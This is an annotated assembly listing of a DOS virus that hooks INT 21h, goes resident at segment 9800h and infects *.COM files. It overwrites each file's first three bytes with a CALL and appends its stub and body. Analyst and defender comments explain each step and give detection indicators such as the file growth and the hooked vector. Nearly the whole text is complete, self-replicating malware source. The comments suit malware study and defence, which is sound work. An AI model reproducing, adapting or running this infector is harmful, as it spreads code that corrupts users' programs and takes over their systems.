
;*****************************************************************************
;           			 VIRUS  DEMO (the one that McAfee found)
;-----------------------------------------------------------------------------

; Analyst note: byte count of the resident body. It is used twice in this
; listing: as the length of the file write taken from cs:0100h, and as the
; REP MOVSB count in the stub that copies the body to segment 9800h.
len	equ	01dch



;-----------------------------------------------------------------------------
;    				FIND FIRST FILE
;-----------------------------------------------------------------------------
; Analyst note: first instruction of the body. The stub further down points
; the INT 21h vector at 9800h:0100h and copies the previous INT 21h vector
; into the INT 70h slot, so "int 70h" throughout this listing is a call to
; the original DOS handler. Presumably this code sits at offset 100h (no ORG
; directive is visible in the listing).
jmp	con			; unconditional: the AH checks below are never reached as written
cmp	ah,3dh			; AH=3Dh is DOS "open file (handle)"
je	con
cmp	ah,0fh			; AH=0Fh is DOS "open file (FCB)"
je 	con
int	70h			; forward the request to the saved DOS handler
iret

; Save the caller's AX, DS and DX; they are popped again before the original
; request is forwarded at the end of the routine.
con:	push	ax
push	ds
push	dx


mov	ah,1ah			; DOS 1Ah: set the disk transfer area to cs:buff
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
int	70h

mov	ah,4eh			; DOS 4Eh: find first file matching cs:fname ("*.COM")
mov	cx,0			; attribute mask 0
mov	dx,cs
mov	ds,dx
mov	dx,offset fname
int	70h
jc	error1			; carry set (no match / error) -> error1

;
;push	cs
;pop	ds
;mov	dx,offset buff
;mov	ah,9
;int	70h
;


;-----------------------------------------------------------------------------
;			FIND FILE SIZE
;-----------------------------------------------------------------------------


; Open the file reported by find-first and measure its length.
; Defender note: the observable event is a read/write open of a *.COM file
; that the foreground program did not ask for.
mov	ah,3dh			; DOS 3Dh: open file by name
mov	al,2			; access mode 2 = read/write
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
add	dx,30			; offset 30 (1Eh) of the find-first DTA holds the ASCIIZ file name
int	70h
jc	error1
mov	fhandle,ax		; keep the handle for every later seek/read/write/close

mov	ah,42h			; DOS 42h: move file pointer
mov	al,2			; origin 2 = end of file
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	70h			; DOS returns the new position (the file length) in DX:AX
jc	error1

push	ax			; low word of the length; popped where sdat1 is computed
;------------------------------------
;	close
;-----------------------------------
;mov	ah,3eh
;mov	bx,fhandle
;int	70h
;jc	error1

jmp	cont			; skip over the error1 exit that follows

;-----------------------------------------------------------------------------
;		NOT	FAR	ERROR
;-----------------------------------------------------------------------------

; Failure exit used by the find/open/seek/read steps: DOS 4Ch (terminate
; process) with return code 1, issued through the saved DOS vector.
; The registers pushed at con are not restored on this path. Since this runs
; inside the INT 21h hook, presumably it is the interrupted program that is
; terminated - an unexpected exit with errorlevel 1 is a visible symptom.
error1: mov	ah,4ch
	mov	al,1
	int	70h


;-----------------------------------------------------------------------------
;                PUT THE CALL INSTRUCTION CODE IN BUFF
;-----------------------------------------------------------------------------

; Build the 3-byte replacement for the start of the file in buff[0..2]:
; opcode E8h (CALL rel16) followed by (file length - 3). AX still holds the
; low word of the length returned by the seek-to-end above.
cont:	sub ax,3	; rel16 counts from the byte after the 3-byte CALL, hence -3
mov	buff+1,al
mov	buff+2,ah
mov	ax,00e8h
mov	buff,al			; only AL (E8h) is stored

;-----------------------------------------------------------------------------
;		READ THE 3 FIRST BYTES FROM THE FILE
;-----------------------------------------------------------------------------

mov	ah,42h			; DOS 42h, origin 0: seek to the start of the file
mov	al,0
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	70h
jc	error1


mov	ah,3fh			; DOS 3Fh: read CX=3 bytes into cs:buff+3
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
add	dx,3
mov	bx,fhandle
mov	cx,3
int	70h
jc	error1
cmp	ax,cx			; AX = bytes actually read
jl	error1			; fewer than 3 bytes -> error1


;-----------------------------------------------------------------------------
;			MOVE 3 BYTES FROM BUFF+3 TO dat1-3
;-----------------------------------------------------------------------------

; dat1..dat3 are the immediate operands of three hand-encoded
; MOV BYTE PTR [100h..102h],imm8 instructions in the stub, so the file's
; original first three bytes end up stored inside the appended stub.
mov	al,buff+3
mov	dat1,al
mov	al,buff+4
mov	dat2,al
mov	al,buff+5
mov	dat3,al

;-----------------------------------------------------------------------------
; 		WRITE THE JMP INSTRUCTION TO THE DISK
;-----------------------------------------------------------------------------


; Overwrite the first three bytes of the file with buff[0..2]. The banner
; above says JMP, but the byte stored in buff is E8h, i.e. a near CALL.
mov	ah,42h			; DOS 42h, origin 0: seek back to offset 0
mov	al,0
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	70h
jc	error1


mov	ah,40h			; DOS 40h: write CX=3 bytes from cs:buff
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
mov	bx,fhandle
mov	cx,3
int	70h
jc	error
cmp	ax,3			; AX = bytes actually written
jne	error			; short write -> error



;mov	ah,0fh
;mov	dx,cs
;mov	ds,dx
;mov	dx,offset myfcb
;int	70h
;or	al,al
;jnz	error1
;
;mov	dx,offset buff
;mov	ah,1ah
;int	70h
;
;mov	word ptr myfcb+0eh,3
;
;mov 	word ptr myfcb+21h,0
;mov	word ptr myfcb+23h,0
;
;mov	ah,22h
;mov	dx,offset myfcb
;int	70h
;or	al,al
;jnz	error1

;mov	ah,10h
;mov 	dx,offset myfcb
;int	70h
;or	al,al
;jnz	error

;-----------------------------------------------------------------------------
;	CALCULATE THE START ADDRESS OF THE VIRUS DATA ITSELF
;-----------------------------------------------------------------------------

; Patch the immediate of the stub's hand-encoded MOV SI (sdat1) before the
; stub is written: low word of the original file length + 16Bh.
; 16Bh = 100h + 6Bh, which matches a .COM load offset of 100h plus the
; 6Bh-byte stub - presumably the run-time offset of the appended body.
pop 	ax			; low word of the length pushed after the seek-to-end
add	ax,16bh
mov	sdat1,al
mov	sdat1+1,ah


;-----------------------------------------------------------------------------
;			CLEAR   FCB
;-----------------------------------------------------------------------------



;mov	cx,7
;mov	si,offset fname
;mov	di,offset fn
;mov	dx,cs
;mov	ds,dx
;mov	dx,cs
;mov	es,dx
;rep movsb



;-----------------------------------------------------------------------------
;			WRITE THE VIRUS PREFIX TO DISK
;-----------------------------------------------------------------------------

;mov	ah,3dh
;mov	al,2
;mov	dx,cs
;mov	ds,dx
;mov	dx,offset fn
;int	70h
;jc	error
;mov	fhandle,ax

; Append to the file: first the 6Bh-byte stub starting at label data, then
; len bytes taken from cs:0100h, then close the handle.
; Defender note: each completed pass grows the file by 6Bh + 1DCh = 247h
; (583) bytes and leaves E8h as its first byte.
mov	ah,42h			; DOS 42h, origin 2: seek to end of file
mov	al,2
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	70h
jc	error

mov	ah,40h			; DOS 40h: write 6Bh bytes from cs:data
mov	dx,cs
mov	ds,dx
mov	dx,offset data
mov	bx,fhandle
mov	cx,006bh
int	70h
jc	error
cmp	ax,006bh		; short write -> error
jne	error


;----------------------------------------------------------------------------
;
;----------------------------------------------------------------------------

mov	ah,40h			; DOS 40h: write len bytes from cs:0100h
mov	dx,cs
mov	ds,dx
mov	dx,0100h
mov	bx,fhandle
mov	cx,len
int	70h
jc	error
cmp	ax,len			; short write -> error
jne	error




;-----------------------------------------------------------------------------
;			CLOSE FILE
;-----------------------------------------------------------------------------

mov	ah,3eh			; DOS 3Eh: close the handle
mov	bx,fhandle
int	70h
jc	error


;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;			WRITE THE VIRUS TO DISK
;-----------------------------------------------------------------------------
;jmp error
;mov	ah,15h
;mov	dx,cs
;mov	ds,dx
;mov	dx,offset myfcb
;
;mov	word ptr myfcb+0eh,len
;int	70h
;or	al,al
;jnz	error
;
;-----------------------------------------------------------------------------
;				CLOSE THE FILE
;-----------------------------------------------------------------------------
;
;mov	ah,10h
;mov	dx,cs
;mov	ds,dx
;mov	dx,offset myfcb
;int	70h
;or	al,al
;jnz	error

; Success path: restore the registers pushed at con, forward the caller's
; original request to the saved DOS handler, then return from the hook.
pop	dx
pop	ds
pop	ax

int	70h

iret




;*****************************************************************************
;  				DATA SECTION
;-----------------------------------------------------------------------------

; Failure exit used by the write and close steps; same action as error1:
; DOS 4Ch (terminate process) with return code 1 through the saved DOS
; vector. Note this is code even though it follows the DATA SECTION banner.
error:	mov 	ah,4ch
	mov	al,1
	int	70h



; buff is the 43-byte disk transfer area handed to DOS 1Ah; its first six
; bytes are later reused for the 3-byte CALL (buff..buff+2) and the three
; bytes read from the file (buff+3..buff+5).
buff	db	43 dup (0)
fname	db	"*.COM",0	; search pattern passed to DOS 4Eh

fhandle dw	?		; handle of the file opened read/write


; Start of the stub: 6Bh bytes from this label are written at the old end of
; the file, where the CALL patched over the file's first three bytes lands.
; The db groups are hand-encoded instructions: C6h 06h lo hi imm8 is
; MOV BYTE PTR [addr],imm8, so the three groups rewrite bytes 100h, 101h and
; 102h with dat1..dat3 (the file's original first three bytes) at run time.
; Defender note: those three bytes sit at stub offsets 4, 9 and 14, which is
; what a repair needs to recover the original program start.
data	db	198,6,0,1
dat1	db	0
datb	db	198,6,1,1
dat2	db	0
datc	db	198,6,2,1
dat3	db	0


pop	bx	; drop the return address pushed by the patched CALL
mov	bx,100h
push	bx	; replace it with 100h, so the final RET resumes at the restored bytes


push	ax
push	ds
push	es



mov 	cx,len			; number of bytes to copy
source	db	190	; BEh = opcode of MOV SI,imm16 (author's note: MOV SI,OFFSET SOURCE)
sdat1	db	0,0	; the imm16; filled in per file before the stub is written
mov 	di,100h
mov	dx,cs
mov	ds,dx
mov	dx,9800h
mov	es,dx
; Copy len bytes from ds:si to 9800h:0100h.
; Defender note: the destination is a fixed segment and no DOS memory
; allocation call is visible in this listing, so a memory scan can look at
; that address directly.
rep movsb



;a	db	154,0,1,0,128	; CALL 9800:0100
;--------------------------------------------------------------------------
;		PUT INT 21H VECT. TO INT 70H
;--------------------------------------------------------------------------
; Copy the INT 21h vector (interrupt table bytes 0:84h.., 21h*4) into the
; INT 70h slot (0:1C0h.., 70h*4). From here on "int 70h" reaches the handler
; that INT 21h pointed to before the hook.
; NOTE(review): operand sizes are not stated; if these assemble as word
; accesses, the four overlapping copies also carry byte 0:88h to 0:1C4h -
; confirm against the assembled bytes.
push	ds			; popped again after the INT 21h vector is rewritten
mov	ax,0
mov	ds,ax			; DS = 0: segment of the interrupt vector table
push 	[84h]
pop     [1c0h]

push	[85h]
pop	[1c1h]

push	[86h]
pop	[1c2h]

push	[87h]
pop	[1c3h]

;------------------------------------------------------------------------
;		HOOK THE VIRUS TO INT 21
;------------------------------------------------------------------------


;push	[84h]	;IP
;push	[85h]	;IP
;push	[86h]	;CS
;push	[87h]	;CS

;mov	dx,9800h
;mov	ds,dx
; put the jump instruction at the end of virus
;mov	al,234
;mov     gen,al ;check if it`s 200h
;pop	al
;mov	gen+4,al
;pop	al
;mov	gen+3,al
;pop	al
;mov	gen+2,al
;pop	al
;mov	gen+1,al

; hook the virus
; Point INT 21h at 9800h:0100h: offset word at 0:84h, segment word at 0:86h.
; Defender note: an INT 21h vector of 9800:0100 together with an INT 70h
; vector holding the previous INT 21h address is the in-memory indicator
; for this sample.
mov	dx,0
mov	ds,dx
mov	ax,100h
mov	[84h],ax
mov	ax,9800h
mov	[86h],ax
pop	ds			; matches the push ds made before the vector copy

;-----------------------------------------------------------------------
;
;-----------------------------------------------------------------------
mov	ah,0fh			; a DOS call with AH=0Fh, now routed through the new vector
int	21h

pop es
pop ds
pop ax

ret				; return address was replaced with 100h earlier in the stub
